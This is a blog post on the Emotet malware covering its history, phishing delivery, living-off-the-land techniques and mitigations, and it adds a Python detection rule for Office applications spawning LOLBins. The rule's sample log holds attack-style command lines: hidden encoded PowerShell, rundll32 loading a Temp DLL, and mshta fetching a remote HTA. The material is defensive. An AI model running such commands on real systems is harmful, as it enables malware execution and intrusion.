
First identified in 2014, Emotet has persisted in disrupting many industries. This resilient malware delivers a variety of malicious payloads to unsuspecting users and has continued to push cybersecurity posture, hunting capabilities, and response mechanisms to (hopefully) new limits across all sectors. First introduced as a banking trojan disguised as something innocuous, Emotet has exhibited rapid growth, agility, and resilience, continually evolving and honing its capabilities to become a Malware-as-a-Service (MaaS) offering in 2017.

Once a user has activated the program via a malicious link or a macro in a downloaded attachment, Command-and-Control (C2) infrastructure is established and access to the compromised target is sold to MaaS buyers. The main objectives of the service’s buyers are to steal valuable information or deploy ransomware for financial gain. In 2021, Europol led a collaborative effort between law enforcement agencies in the Netherlands, Germany, the United States, the United Kingdom, France, Lithuania, Canada, and Ukraine, dubbed “Operation Ladybird”, that successfully shut down the Emotet operation for a brief time.

Emotet re-emerged swiftly, adapting its email campaigns to include timely and realistic IRS- and Covid-19-related content. The threat actors behind Emotet quickly added evasion techniques, expanded C2 capabilities, and increased infection mechanisms. Emotet is polymorphic, meaning the code changes its form between samples and contains logic built to evade detection. Payloads delivered by Emotet include IcedID, TrickBot, UmberCrypt, and QakBot. The actors behind Emotet have followed an agile software development lifecycle, adapting to detection mechanisms by increasing the program’s obfuscation and by spreading it laterally through a network. These characteristics make detection difficult.

Some of the more essential observations concerning Emotet are:

  • Successful phishing campaigns mimicking trusted sources are common because of the effort put into curating realistic and enticing embedded links and attachments.
  • Possible mitigations against this threat include an engaging user awareness training program, identifying a secure online document-sharing solution, and investing in a spam filter tool.
  • Companies could remove attachments from corporate email, force all email to text-only format, or prohibit personal email access from the enterprise network. The company may opt to offer a secured but completely segmented network for personal devices, or provide a few shared workstations for employee use. A segmented network would allow users to access personal communication while reducing the attack surface that email and personal devices present.
  • Living Off the Land (LOL) use of the .NET Framework, PowerShell, rundll32.exe, mshta.exe, and both VBA and XL4 (Excel 4.0) macros allows Emotet, and malicious programs like it, to be easily obfuscated and challenging to detect.
  • Remediation steps to help lessen this vulnerability are threefold: with the guidance of a highly knowledgeable Microsoft Subject Matter Expert (SME), achieve a more secure posture while preserving functionality through (1) a least-privilege methodology, (2) the identification and removal of unneeded software or services (platform bloat), and (3) the identification of vulnerable files and services that warrant extra scrutiny. In addition, ensure that the network and security tool stacks are configured and tuned to alert on Indicators of Compromise (IOCs) specific to Emotet.
  • .NET and PowerShell are integral to functionality on Windows Operating System (OS) platforms. .NET is used to build applications that interact directly with the most critical OS files, and PowerShell uses .NET to perform many of its tasks. These components are therefore always present in the Windows OS and are not inherently suspicious. Their frequent legitimate use makes it difficult to maintain the required functionality while achieving the necessary security levels.
  • Macros are commonly used to enhance user experience and perform tasks specific to a business line. They are often found in environments that require mathematical expressions and functions, such as financial institutions.
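The two bullets on LOL binaries and on tuning the tool stack to alert on Emotet-style behaviour are easier to act on with a concrete rule. The following is an added example written for this page, not code from the original post or from SimSpace. It parses a handful of constructed process-creation log lines (pipe-separated, not any real product’s format) and flags the chain the article describes: an Office application spawning rundll32.exe, mshta.exe, or PowerShell, optionally with extra weight for encoded PowerShell, a DLL loaded from a user-writable path, or a remote HTA. The image names, field layout, and scoring heuristics are assumptions for illustration.

```python
"""Flag Office-spawned LOLBin process creations (constructed detection example)."""
import re
from dataclasses import dataclass

# Assumed image names of Office applications whose macros launch children.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# LOLBins named in the article (pwsh.exe added for PowerShell 7).
LOLBINS = {"powershell.exe", "pwsh.exe", "rundll32.exe", "mshta.exe"}

# PowerShell's -EncodedCommand switch and its accepted abbreviations.
ENCODED_PS = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", re.I)
# A DLL path under a user profile is a weak but useful signal for rundll32.
USER_WRITABLE = re.compile(r"\\users\\[^\\]+\\appdata\\", re.I)
REMOTE_URL = re.compile(r"https?://", re.I)

# Constructed sample telemetry: timestamp|host|parent_image|image|command_line
SAMPLE_LOG = r"""
2023-03-01T09:12:01Z|WS-0042|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\rundll32.exe|rundll32.exe C:\Users\jdoe\AppData\Local\Temp\abc.dll,Control_RunDLL
2023-03-01T09:12:05Z|WS-0042|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe report.txt
2023-03-01T09:15:30Z|WS-0077|C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc AAAAAAAA
2023-03-01T09:16:00Z|WS-0077|C:\Windows\System32\svchost.exe|C:\Windows\System32\rundll32.exe|rundll32.exe shell32.dll,Control_RunDLL
2023-03-01T09:20:11Z|WS-0099|C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|C:\Windows\System32\mshta.exe|mshta.exe http://example.invalid/x.hta
"""


@dataclass
class Event:
    ts: str
    host: str
    parent: str
    image: str
    cmdline: str


def parse_events(log_text: str) -> list[Event]:
    """Split the pipe-separated lines into Event records; blank lines are skipped."""
    events = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(Event(ts, host, parent, image, cmdline))
    return events


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, so comparisons ignore directory and case."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Event) -> list[str]:
    """Return the list of reasons an event looks like Office-launched LOLBin abuse."""
    reasons = []
    parent, child = basename(ev.parent), basename(ev.image)
    if parent in OFFICE_PARENTS and child in LOLBINS:
        reasons.append(f"office-app {parent} spawned LOLBin {child}")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_PS.search(ev.cmdline):
        reasons.append("encoded PowerShell command")
    if child == "rundll32.exe" and USER_WRITABLE.search(ev.cmdline):
        reasons.append("rundll32 loading DLL from user-writable path")
    if child == "mshta.exe" and REMOTE_URL.search(ev.cmdline):
        reasons.append("mshta executing remote HTA")
    return reasons


def detect(log_text: str) -> list[tuple[str, str, list[str]]]:
    """Run the rule over every event and return (host, child image, reasons) for hits."""
    findings = []
    for ev in parse_events(log_text):
        reasons = score_event(ev)
        if reasons:
            findings.append((ev.host, basename(ev.image), reasons))
    return findings


if __name__ == "__main__":
    for host, image, reasons in detect(SAMPLE_LOG):
        print(f"{host}: {image} -> {'; '.join(reasons)}")
```

The parent-child pairing is the core signal: rundll32.exe launched by svchost.exe with a system DLL (line four of the sample) is routine and produces no finding, while the same binary launched by WINWORD.EXE with a DLL in a user’s Temp folder is flagged twice. Tuning consists of extending OFFICE_PARENTS and LOLBINS to match what your telemetry actually names, and of reviewing the secondary heuristics against a baseline of your own environment so that legitimate macro-driven automation is allow-listed rather than silenced.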

In many companies, some processes have been established and used for years. These processes can rely on End of Life (EoL) components, contain vulnerable code, or have been built with no security precautions in place. Macros in Excel and Word documents are a prime example. Often the individual who established the process is no longer available, and institutional knowledge has dwindled to the point of accepting the process and attempting to safeguard it as is. We often see an unwillingness to upgrade components that could impact the functionality of the process (i.e., the macro), which may result in a complete aversion to updating any software. Workload, timelines, and other pressures can inadvertently foster an environment that favors results over time-consuming security practices or documentation. An emphasis on security-based, approved processes and frameworks is critical, and subverting them should not be celebrated for the sake of time saved.

When the proper steps are performed, a task takes longer to complete. Due diligence takes time. Tasks should be measured against the actual time they take to perform while following proper security procedures. If it takes 20 minutes to follow all policies and ensure compliance, then a shorter time indicates a potential issue to investigate. To verify the timeframe for compliant task performance, use job rotation: train another individual via the official documentation, then document and compare the results.

Resources: VMware’s Threat Analysis Team has done a great job breaking down Emotet and exposing the threat further.

Their report can be downloaded here: https://blogs.vmware.com/security/2022/10/emotet-exposed-a-look-inside-the-cybercriminal-supply-chain.html

Microsoft’s Detection and Response Team has published their analysis and findings of Emotet’s enterprise-wide destruction here: https://www.microsoft.com/security/blog/2020/04/02/full-operational-shutdown-another-cybercrime-case-microsoft-detection-and-response-team/

Blog by Lori Brumm
Lori Brumm is a Lead Cyber Range Engineer at SimSpace. She has worked in the IT/cybersecurity field for 20 years across multiple sectors, including commercial, private, and non-profit, as well as federal and state government. A lifelong learner, Lori recently renewed her academic dedication by earning CISSP and CCSP certifications from (ISC)² as well as continuing to evolve her 2003 Associate’s in Applied Technology to a Bachelor’s in Applied Cybersecurity with SANS Technical Institute.